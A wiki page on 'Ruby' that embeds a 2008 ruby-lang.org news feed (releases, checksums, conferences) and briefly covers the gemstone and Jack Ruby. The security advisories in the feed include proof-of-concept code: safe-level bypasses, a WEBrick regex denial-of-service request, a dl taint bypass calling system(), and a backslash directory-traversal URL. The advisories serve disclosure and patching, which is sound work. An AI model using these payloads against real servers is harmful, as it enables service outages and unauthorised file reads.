Ruby

From S23Wiki

Contents

[edit] Ruby Programming Language

Ruby is a programming language from Japan.

Try Ruby? (in your browser)

IRC: #ruby-lang on EfNet

[edit] Feed

Ruby 1.8.7-p72 and 1.8.6-p287 released

Ruby 1.8.7-p72 and 1.8.6-p287 have been released. The last releases were incomplete, and the new releases include fixes of the previously announced vulnerability of dl.

The released source archives are available at:

Checksums:

MD5(ruby-1.8.6-p287.tar.gz)= f6cd51001534ced5375339707a757556 SHA256(ruby-1.8.6-p287.tar.gz)= 6463d1932c34ff72b79174ac7d2c28940d29d147928250928a00a0dbee43db57 SIZE(ruby-1.8.6-p287.tar.gz)= 4590393  MD5(ruby-1.8.6-p287.tar.bz2)= 80b5f3db12531d36e6c81fac6d05dda9 SHA256(ruby-1.8.6-p287.tar.bz2)= ac15a1cb78c50ec9cc7e831616a143586bdd566bc865c6b769a0c47b3b3936ce SIZE(ruby-1.8.6-p287.tar.bz2)= 3956902  MD5(ruby-1.8.6-p287.zip)= e555d51f5b387fdd52ae53d9bafa13f5 SHA256(ruby-1.8.6-p287.zip)= 844c66c015565839531a34b83e0526cd4fa2a71cc0f5cc8ddb0d4c158403543a SIZE(ruby-1.8.6-p287.zip)= 5606238  MD5(ruby-1.8.7-p72.tar.gz)= 5e5b7189674b3a7f69401284f6a7a36d SHA256(ruby-1.8.7-p72.tar.gz)= e15ca005076f5d6f91fc856fdfbd071698a4cadac3c6e25855899dba1f6fc5ef SIZE(ruby-1.8.7-p72.tar.gz)= 4805594  MD5(ruby-1.8.7-p72.tar.bz2)= 0b215c46b89b28d7ab8d56d96e72d5b9 SHA256(ruby-1.8.7-p72.tar.bz2)= a8f8a28e286dd76747d8e97ea5cfe7a315eb896906ab8c8606d687d9f6f6146e SIZE(ruby-1.8.7-p72.tar.bz2)= 4127450  MD5(ruby-1.8.7-p72.zip)= b44fe5a12d4bf138ba0d3660e13a8216 SHA256(ruby-1.8.7-p72.zip)= 77e67be4aa8c3e041e1d20d24e5fcf2e33ad9bccb3da3332b6c0a5b648334903 SIZE(ruby-1.8.7-p72.zip)= 5855902

For a full list of all changes, see the bundled files named ChangeLog, which are also available at the following locations:

[?]
Multiple vulnerabilities in Ruby

Multiple vulnerabilities have been discovered in Ruby. It's recommended that you upgrade to the latest versions.

Details

The following vulnerabilities have been discovered.

Several vulnerabilities in safe level

Several vulnerabilities in safe level have been discovered.

  • untrace_var is permitted at safe level 4.

    trace_var(:$VAR) {|val| puts "$VAR = #{val}" }  Thread.new do  $SAFE = 4  eval %q{    proc = untrace_var :$VAR    proc.first.call("aaa")  } end.join

  • $PROGRAM_NAME may be modified at safe level 4.

    Thread.new do  $SAFE = 4  eval %q{$PROGRAM_NAME.replace "Hello, World!"} end.join  $PROGRAM_NAME #=> "Hello, World!"

  • Insecure methods may be called at safe level 1-3.

    class Hello  def world    Thread.new do      $SAFE = 4      msg = "Hello, World!"      def msg.size        self.replace self*10 # replace string        1 # return wrong size      end      msg    end.value  end end  $SAFE = 1 # or 2, or 3 s = Hello.new.world if s.kind_of?(String)  puts s if s.size < 20 # print string which size is less than 20 end

  • Syslog operations are permitted at safe level 4.

    require "syslog"  Syslog.open  Thread.new do  $SAFE = 4  eval %q{    Syslog.log(Syslog::LOG_WARNING, "Hello, World!")    Syslog.mask = Syslog::LOG_UPTO(Syslog::LOG_EMERG)    Syslog.info("masked")    Syslog.close  } end.join

These vulnerabilities were reported by Keita Yamaguchi.

DoS vulnerability in WEBrick

WEBrick::HTTP::DefaultFileHandler is faulty of exponential time taking requests due to a backtracking regular expression in WEBrick::HTTPUtils.split_header_value.

Exploitable server:

require 'webrick' WEBrick::HTTPServer.new(:Port => 2000, :DocumentRoot => "/etc").start

Attack:

require 'net/http' res = Net::HTTP.start("localhost", 2000) { |http|   req = Net::HTTP::Get.new("/passwd")   req['If-None-Match'] = %q{meh=""} + %q{foo="bar" } * 100   http.request(req) } p res

The request likely won't finish in this universe.

This vulnerability was reported by Christian Neukirchen.

Lack of taintness check in dl

dl doesn't check taintness, so it could allow attackers to call dangerous functions.

require 'dl' $SAFE = 1 h = DL.dlopen(nil) sys = h.sym('system', 'IP') uname = 'uname -rs'.taint sys[uname]

This vulnerability was reported by sheepman.

DNS spoofing vulnerability in resolv.rb

resolv.rb allow remote attackers to spoof DNS answers. This risk can be reduced by randomness of DNS transaction IDs and source ports, so resolv.rb is fixed to randomize them.

This vulnerability was reported by Tanaka Akira.

Vulnerable versions

1.8 series
  • 1.8.5 and all prior versions
  • 1.8.6-p286 and all prior versions
  • 1.8.7-p71 and all prior versions
1.9 series
  • r18423 and all prior revisions

Solution

1.8 series
Please upgrade to 1.8.6-p287, or 1.8.7-p72.
1.9 series

Please check out the latest version using Subversion.

$ svn co http://svn.ruby-lang.org/repos/ruby/trunk ruby

Please note that a package that corrects this weakness may already be available through your package management software.

Credit

Credit to Keita Yamaguchi, Christian Neukirchen, sheepman, and Tanaka Akira for disclosing these problems to Ruby Security Team.

Changes

[?]
RubyConf 2008 Proposals Now Being Accepted

RubyConf 2008 will be held in Orlando, Florida, USA, from November 6 to November 8.

Proposals for presentations are now begin accepted. All proposals must be received by August 21.

[?]
Arbitrary code execution vulnerabilities

Multiple vulnerabilities in Ruby may lead to a denial of service (DoS) condition or allow execution of arbitrary code.

Impact

With the following vulnerabilities, an attacker can lead to denial of service condition or execute arbitrary code.

Vulnerable versions

1.8 series
  • 1.8.4 and all prior versions
  • 1.8.5-p230 and all prior versions
  • 1.8.6-p229 and all prior versions
  • 1.8.7-p21 and all prior versions
1.9 series
  • 1.9.0-1 and all prior versions

Solution

1.8 series
Please upgrade to 1.8.5-p231, or 1.8.6-p230, or 1.8.7-p22.
1.9 series
Please upgrade to 1.9.0-2.

These versions also fix the vulnerability of WEBrick (CVE-2008-1891).

Please note that a package that corrects this weakness may already be available through your package management software.

Credit

Credit to Drew Yao of Apple Product Security for disclosing the problem to Ruby Security Team.

Changes

  • 2008-06-21 00:29 +09:00 removed wrong CVE IDs (CVE-2008-2727, CVE-2008-2728).
[?]
RubyNation 2008

RubyNation is an annual Ruby conference serving the Virginia, West Virginia, Maryland, and Washington, DC areas. This year's RubyNation will happen on August 1&2, 2008 in Herndon, VA. Please visit the RubyNation site for more details.

[?]
Ruby 1.8.7 has been released

Akinori MUSHA announced today that Ruby 1.8.7 has been released.

The new version of Ruby includes many bug fixes, lots of feature enhancements backported from 1.9 and some performance improvements since 1.8.6 while maintaining stability and backward compatibility with the previous release to a high degree. See the bundled documentation for details about compatibility issues.

The source code package is available in three formats at the following locations:

Checksums:

  • MD5 (ruby-1.8.7.tar.bz2) = f17f14c8d55e731b3ce1bc35c42f0a6c
  • SHA256 (ruby-1.8.7.tar.bz2) = 65f2a862ba5e88bac7a78cff15bcb88d7534e741b51a1ffb79a0136c7041359a
  • SIZE (ruby-1.8.7.tar.bz2) = 4100024
  • MD5 (ruby-1.8.7.tar.gz) = de906850f9a012c12ffc6e9f56fb1b66
  • SHA256 (ruby-1.8.7.tar.gz) = 600dccf13bca3e4179fa6ff554220ce4ba67ffc72bce1ac3bf74c2599c03a0ca
  • SIZE (ruby-1.8.7.tar.gz) = 4799732
  • MD5 (ruby-1.8.7.zip) = 14d3eb37b32e4a26966bdd80f361ccd2
  • SHA256 (ruby-1.8.7.zip) = 805987ad167d8f9cac90e4b9342686e96a7708664111be27a3c6d680ce21d6c1
  • SIZE (ruby-1.8.7.zip) = 5851408

For a brief list of user visible changes and a full list of all changes, see the bundled files named NEWS and ChangeLog, which are also available at the following locations:

  • http://svn.ruby-lang.org/repos/ruby/tags/v1_8_7/NEWS
  • http://svn.ruby-lang.org/repos/ruby/tags/v1_8_7/ChangeLog
[?]
Server maintenance

Services on ruby-lang.org except SVN will be down for server maintenance on Fri May 23 02:00:00 UTC 2008. Sorry for inconvenience.

[?]
Tulsa Ruby Workshop

I wanted to get the word out about the upcoming Tulsa Ruby Workshop. This will take place on April 26th, from 10 AM to 4 PM in Tulsa, OK.

The workshop has a great line up of intro Ruby and Rail content. I’m honored to have been asked to give two of the talks that day: an introduction to Ruby talk as well as a Ruby from Java talk. There will also be a beginning Rails talk from Tulsa.rb’s commander and chief, an Engine Yard employee on hand sharing deployment advice, as well as other language specific migration talks.

That’s pretty much a full day of Ruby learning and the best news is that attendance is free. They are even throwing in some food.

If you’re going to be in the area, definitely come join us!

You can find directions, a schedule, and other details about the workshop at:

http://tulsarb.org/wiki/Tulsa_Ruby_Workshop

Hope to see you there.

[?]
File access vulnerability of WEBrick

WEBrick, a standard library of Ruby to implement HTTP servers, has file access vulnerability.

Impact

The following programs are vulnerable.

  1. Programs that publish files using WEBrick::HTTPServer.new with the :DocumentRoot option
  2. Programs that publish files using WEBrick::HTTPServlet::FileHandler

Affected systems are:

  1. Systems that accept backslash (\) as a path separator, such as Windows.
  2. Systems that use case insensitive filesystems such as NTFS on Windows, HFS on Mac OS X.

This vulnerability has the following impacts.

  1. Attacker can access private files by sending a url with url encoded backslash (\). This exploit works only on systems that accept backslash as a path separator.

    Example:

    http://[server]:[port]/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
  2. Attacker can access files that matches to the patterns specified by the :NondisclosureName option (the default value is [".ht*", "*~"]). This exploit works only on systems that use case insensitive filesystems.

Vulnerable versions

1.8 series
  • 1.8.4 and all prior versions
  • 1.8.5-p114 and all prior versions
  • 1.8.6-p113 and all prior versions
1.9 series
  • 1.9.0-1 and all prior versions

Solution

1.8 series
Please upgrade to 1.8.5-p115 or 1.8.6-p114.
1.9 series
Please apply the following patch to lib/webrick/httpservlet/filehandler.rb.

Please note that a package that corrects this weakness may already be available through your package management software.

Credit

Credit to Digital Security Research Group (<URL:http://dsec.ru/>) for disclosing the problem to Ruby Security Team.

[?]
Scotland on Rails 2008

Scotland on Rails is pleased to announce that Conference2008 is open for registration. There is a limit to the number of registrations we’re able to accept so we’d advise you to get in quickly :-)

You can register at http://scotlandonrails.com/register The conference will take place on April 4th and 5th in Edinburgh (in a castle!), Scotland and will feature speakers from the UK, Europe, US and New Zealand including keynotes from Michael Koziarski and David Black. A list of sessions and speakers is available at http://scotlandonrails.com/talks.

We’re also planning a charity event on Thursday 3rd. This will feature an beginner level intro to Ruby and Rails in the morning, and sessions from several of the speakers from the main conference (including Jim Weirich, Bruce Williams and Giles Bowkett) in the afternoon. All the money raised from that days event will be going to CHAS – The Childrens Hospice Association.

[?]

Related: Perl

[edit] Gemstone

Ruby is corundum when its red, if its another color its a sapphire.

Corundum is the crystalline form of aluminium oxide, Al2O3.

The color is caused mainly by chromium. Its name originates from ruber, Latin for red.



[edit] Jack Ruby

JFK: In Defense of Jack Ruby

Wikipedia:Jack Ruby

Jack Ruby's Polygraph Test

Mobster, Intelligence Agent, or Small-time Hustler?

Video of Ruby's statement

Retrieved from "http://s23.org/wiki/Ruby"
Personal tools